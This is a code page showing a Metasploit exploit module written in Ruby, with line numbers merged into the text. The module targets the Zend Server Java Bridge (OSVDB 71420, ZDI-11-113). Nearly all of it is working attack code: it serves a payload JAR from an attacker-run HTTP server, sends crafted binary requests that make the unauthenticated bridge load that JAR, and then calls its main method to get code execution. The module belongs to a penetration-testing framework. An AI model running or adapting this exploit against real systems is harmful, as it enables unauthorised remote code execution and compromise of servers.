Path: blob/master/modules/exploits/multi/misc/zend_java_bridge.rb
19511 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::HttpServer9include Msf::Exploit::Remote::Tcp1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Zend Server Java Bridge Arbitrary Java Code Execution',16'Description' => %q{17This module takes advantage of a trust relationship issue within the18Zend Server Java Bridge. The Java Bridge is responsible for handling interactions19between PHP and Java code within Zend Server.2021When Java code is encountered Zend Server communicates with the Java Bridge. The22Java Bridge then handles the java code and creates the objects within the Java Virtual23Machine. This interaction however, does not require any sort of authentication. This24leaves the JVM wide open to remote attackers. Sending specially crafted data to the25Java Bridge results in the execution of arbitrary java code.26},27'Author' => [ 'bannedit' ],28'License' => MSF_LICENSE,29'References' => [30[ 'OSVDB', '71420'],31[ 'ZDI', '11-113'],32[ 'EDB', '17078' ],33],34'Platform' => ['java'], # win35'Arch' => ARCH_JAVA,36'Privileged' => true,37'Targets' => [38[ 'Linux', {}],39[ 'Windows', {}],40],41'DisclosureDate' => '2011-03-28',42'DefaultTarget' => 0,43'Notes' => {44'Reliability' => UNKNOWN_RELIABILITY,45'Stability' => UNKNOWN_STABILITY,46'SideEffects' => UNKNOWN_SIDE_EFFECTS47}48)49)50register_options([ Opt::RPORT(10001) ])51end5253def exploit54start_service()55send_java_require56end5758def send_java_require()59connect6061jar = rand_text_alpha(rand(8) + 1) + '.jar'62path = get_uri + '/' + jar63uri_len = path.length64java_require = [0xffffffff, 0x16000000].pack('V*') +65"setAdditionalClassPath" + [0x01000000, 0x00000004].pack('V*') +66[uri_len].pack('C') + path6768java_require = [java_require.length].pack('N') + java_require6970print_status("Sending java_require() request... #{path}")71sock.put(java_require)72res = sock.get_once7374select(nil, nil, nil, 5) # wait for the request to be handled75create_and_exec76end7778def create_and_exec79print_status("Sending Final Java Bridge Requests")8081create_obj =82[0x34000000, 0x00000000, 0x0c000000].pack('V*') +83"CreateObject" +84[0x02000000, 0x00000004].pack('V*') + [0x12].pack('C') +85"metasploit.Payload" +86[0x07000000].pack('N') + [0x00].pack('C')8788sock.put(create_obj)89res = sock.get_once90obj_id = res[5, 4]9192callmain =93[0x1f000000].pack('V') + obj_id + [0x04000000].pack('V') + "main" +94[0x01000000, 0x00000008, 0x00000201, 0x00040000].pack('V*') + [0x00].pack('C') +95[0x00].pack('C') + [0x00].pack('C')9697sock.put(callmain)98sock.get_once99handler()100end101102def on_request_uri(cli, request)103if request.uri =~ /\.jar$/i104send_response(cli, payload.encoded,105{106'Content-Type' => 'application/java-archive',107'Connection' => 'close',108'Pragma' => 'no-cache'109})110111print_status("Replied to Request for Payload JAR")112end113end114end115116117